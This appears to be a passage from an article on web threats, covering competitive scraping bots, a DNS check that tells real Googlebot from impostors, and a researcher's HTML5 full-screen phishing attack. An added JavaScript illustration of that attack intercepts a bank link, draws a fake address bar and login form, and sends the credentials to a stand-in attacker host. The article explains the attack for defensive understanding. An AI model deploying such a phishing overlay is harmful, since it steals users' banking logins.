Not all attacks are aimed at breaching a company's defenses. Automated Web bots scrape information from Web pages that can give a competitor better intelligence on your business. For example, if you have an online store, a competitor could collect your pricing data from publicly available pages on your site, says Marc Gaffan, co-founder of Web security firm Incapsula. "Are they breaching your site? No, but they are harming your business," he says. More than 30% of Web traffic to the average site is this sort of unwanted, potentially business-sapping traffic, Gaffan says.
Web application firewall services such as Incapsula and CloudFlare let businesses separate legitimate search-engine crawlers from scrapers run by market-intelligence services, and from bots that merely impersonate Googlebot by copying its User-Agent string. Such services block the unwanted requests, so the information never reaches competitors.
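The check that separates a real Googlebot from a scraper wearing its User-Agent is not specific to any one vendor: reverse-resolve the source IP, require a name under googlebot.com or google.com, then forward-resolve that name and require it to map back to the same IP. The following is an added example, not Incapsula's or CloudFlare's code; the DNS tables, IP addresses and log lines are constructed so that it runs offline (in production, the resolver would be backed by real lookups such as Node's dns.promises.reverse and dns.promises.resolve4):

```javascript
'use strict';
// Added example, not a vendor's code: telling a genuine Googlebot from a scraper
// that only sets Googlebot's User-Agent, using the reverse-then-forward DNS check.
// The DNS data below is constructed. 198.51.100.9 is a scraper whose owner controls
// its PTR record and points it at a googlebot.com name; the forward lookup of that
// name does not return 198.51.100.9, which is what exposes the spoof.
const CONSTRUCTED_DNS = {
  reverse: {
    '66.249.66.1':  ['crawl-66-249-66-1.googlebot.com'],
    '203.0.113.7':  ['scraper.example.net'],
    '198.51.100.9': ['crawl-66-249-66-1.googlebot.com'],
  },
  forward: {
    'crawl-66-249-66-1.googlebot.com': ['66.249.66.1'],
    'scraper.example.net':             ['203.0.113.7'],
  },
};

// Resolver interface the verifier depends on: reverse(ip) -> hostnames[],
// forward(hostname) -> ips[]. Both return [] when nothing resolves.
function tableResolver(tables) {
  return {
    reverse: (ip) => tables.reverse[ip] || [],
    forward: (host) => tables.forward[host] || [],
  };
}

// The dot before the label matters: "evil-googlebot.com" must not match.
const GOOGLE_CRAWLER_SUFFIX = /\.(googlebot|google)\.com$/i;

function isGenuineGooglebot(ip, resolver) {
  for (const host of resolver.reverse(ip)) {
    if (!GOOGLE_CRAWLER_SUFFIX.test(host)) continue;      // PTR in the wrong domain
    if (resolver.forward(host).includes(ip)) return true;  // PTR confirmed by forward record
  }
  return false;  // no PTR, wrong domain, or a PTR the forward lookup does not confirm
}

// Parse one line in Apache/nginx "combined" log format; null if it does not match.
const COMBINED_LOG = /^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;
function parseCombinedLogLine(line) {
  const m = COMBINED_LOG.exec(line);
  return m ? { ip: m[1], request: m[2], status: m[3], userAgent: m[4] } : null;
}

// Classify a request: verified Google crawler, something impersonating one,
// or ordinary traffic (browsers and bots that do not claim to be Googlebot).
function classifyRequest(line, resolver) {
  const req = parseCombinedLogLine(line);
  if (!req) return 'unparsed';
  if (!/Googlebot/i.test(req.userAgent)) return 'other';
  return isGenuineGooglebot(req.ip, resolver) ? 'verified-googlebot' : 'fake-googlebot';
}

// Constructed sample log lines: a real crawler, a scraper with a spoofed UA,
// a scraper with a spoofed UA and a spoofed PTR, and an ordinary browser.
const SAMPLE_LOG = [
  '66.249.66.1 - - [10/Oct/2013:13:55:36 +0000] "GET /products/123 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
  '203.0.113.7 - - [10/Oct/2013:13:55:37 +0000] "GET /products/123 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
  '198.51.100.9 - - [10/Oct/2013:13:55:38 +0000] "GET /products/124 HTTP/1.1" 200 5098 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
  '192.0.2.44 - - [10/Oct/2013:13:55:39 +0000] "GET /products/124 HTTP/1.1" 200 5098 "https://www.example.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8) Firefox/24.0"',
];

function classifySampleLog() {
  const resolver = tableResolver(CONSTRUCTED_DNS);
  return SAMPLE_LOG.map((line) => classifyRequest(line, resolver));
}

console.log(classifySampleLog());
// -> [ 'verified-googlebot', 'fake-googlebot', 'fake-googlebot', 'other' ]
```

The third sample line is the case a User-Agent-only or PTR-only check gets wrong: the reverse lookup looks like Google, and only the forward confirmation reveals that the name does not belong to that IP. Verdicts from this check are what a WAF would then feed into its block or allow decision.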
10. New Technology, Same Problems
Stanford graduate student and computer security researcher Feross Aboukhadijeh recently showed how an HTML5 feature could let an attacker pull off a convincing phishing attack. Using HTML5's ability to put a page into full-screen mode, Aboukhadijeh built proof-of-concept pages that could fool users into thinking they had gone to a bank's website when, in fact, they were still on an attacker's site.
Say you're using Firefox on Mac OS X and click a link that appears to go to Bank of America's consumer banking site. With Aboukhadijeh's attack, that link sits on an attacker-controlled page and your click is intercepted by the page's script. Because some browsers don't notify users that they're entering full-screen mode, the attacker can paint a full-screen disguise of any site, complete with a fake browser address bar, and use the fake page to harvest victims' login credentials.
In this case, rather than sending you to bankofamerica.com, the attacker throws up a full-screen page that makes it appear you're on the real Bank of America site. A careful look could reveal that parts of the screen, such as the menu bar, don't match the user's normal desktop, but most people won't look that closely.
"Links are the bread and butter of the Web," Aboukhadijeh wrote on his site. "People click links all day long -- people are pretty trained to think that clicking a link on the Web is safe. Savvy users may check the link's destination in the status bar before clicking. However, in this case, it won't do them any good." That's because the link's destination, which is what the status bar shows, can genuinely point at the real site, say, bofa.com; the attacker's script simply intercepts the click before the browser ever follows it.
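What that interception looks like in code, as an added illustration of the technique described above and not Aboukhadijeh's own proof of concept: the anchor's href is the bank's real URL, so the status bar is telling the truth, but the click handler cancels the navigation, paints a fake address bar and login form into an overlay, and asks for full-screen mode. The markup, element ids and attacker host are assumptions, and a small stand-in for the browser objects at the bottom lets the flow run under Node, where there is no real DOM. The defender-side function is an assumed heuristic of the sort a browser extension could apply, not a documented browser feature.

```javascript
'use strict';
// Added example of the HTML5 full-screen phishing trick; not the researcher's code.
// Layout, ids, and the attacker host (attacker.example) are assumptions.

const REAL_URL = 'https://www.bankofamerica.com/';   // the honest-looking href
const FAKE_ADDRESS_BAR = 'www.bankofamerica.com';    // text painted into the fake chrome

// Markup the attacker paints over the whole screen once full-screen is granted:
// a drawn "browser chrome" on top, a copied login form beneath it.
function fakeBrowserChrome(shownHost) {
  return '<div id="fake-chrome" style="background:#eee;padding:6px;font:13px sans-serif">' +
    '&#x25C0; &#x25B6; &#x21BB; <span style="border:1px solid #999;padding:2px 200px 2px 6px">' +
    '&#x1F512; https://' + shownHost + '</span></div>';
}
function fakeLoginForm(exfilUrl) {
  return '<form id="fake-login" method="POST" action="' + exfilUrl + '">' +
    'Online ID <input name="user"> Passcode <input name="pass" type="password">' +
    '<button>Sign In</button></form>';
}

// Attacker side. Attached as the click handler of
//   <a id="decoy" href="https://www.bankofamerica.com/">Sign in</a>
// The status bar shows REAL_URL because that really is the href; the handler
// just never lets the browser follow it.
function onDecoyClick(event, doc, exfilUrl) {
  event.preventDefault();                               // navigation suppressed
  const overlay = doc.getElementById('overlay');
  overlay.innerHTML = fakeBrowserChrome(FAKE_ADDRESS_BAR) + fakeLoginForm(exfilUrl);
  overlay.requestFullscreen();                          // real address bar disappears
  return overlay;
}

// Defender side (assumed heuristic, e.g. for a browser extension): when the page
// goes full-screen and the full-screen element contains a password field, surface
// the real origin, because any address bar drawn inside the page cannot be trusted.
function fullscreenPasswordWarning(doc) {
  const el = doc.fullscreenElement;
  if (!el) return null;
  const hasPassword = /type="password"/i.test(el.innerHTML);
  return hasPassword ? 'Password field shown full-screen by ' + doc.location.host : null;
}

// Minimal stand-in for the browser objects the functions above touch, so the
// control flow can be exercised under Node. Real browsers supply the real ones.
function makeFakeBrowser(attackerHost) {
  const overlay = {
    id: 'overlay',
    innerHTML: '',
    requestFullscreen() { doc.fullscreenElement = overlay; },
  };
  const doc = {
    location: { host: attackerHost },
    fullscreenElement: null,
    getElementById(id) { return id === 'overlay' ? overlay : null; },
  };
  return doc;
}

// Walk through one victim click and report what the victim saw versus what happened.
function simulateVictimClick(attackerHost) {
  const doc = makeFakeBrowser(attackerHost);
  const link = { href: REAL_URL };                    // what the status bar showed
  let navigatedTo = link.href;
  const event = { preventDefault() { navigatedTo = null; } };
  onDecoyClick(event, doc, 'https://' + attackerHost + '/collect');
  return {
    statusBarShowed: link.href,
    navigatedTo,                                      // null: the bank was never loaded
    inFullscreen: doc.fullscreenElement !== null,
    paintedAddressBar: doc.fullscreenElement.innerHTML.includes('https://' + FAKE_ADDRESS_BAR),
    warning: fullscreenPasswordWarning(doc),
  };
}

console.log(simulateVictimClick('attacker.example'));
```

The point the simulation makes is the one in the quote above: checking the status bar passes, because the href is real; the deception happens after the click, in script, and only the browser (or an extension with access to the real origin) is in a position to warn.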
Automated security testing tools that can find HTML5-specific issues aren't widely available yet, says NT Objectives' Kuykendall. "People are outpacing their security tools, which is going to leave them exposed," he says.
Training developers in secure practices, especially on new platforms such as HTML5, is a critical first step to preventing security problems. In addition, peer code review, with developers checking one another's code, can cut down on vulnerabilities.
As with any collection of threats, businesses will find themselves with different exposures. An online business may have SQL injection and HTML5 issues, while a firm with a lot of telecommuters may have mobile issues, including exposed devices with embedded vulnerabilities. Rather than attempt to minimize the dangers from every threat, companies should focus on the subset of vulnerabilities where they're most exposed.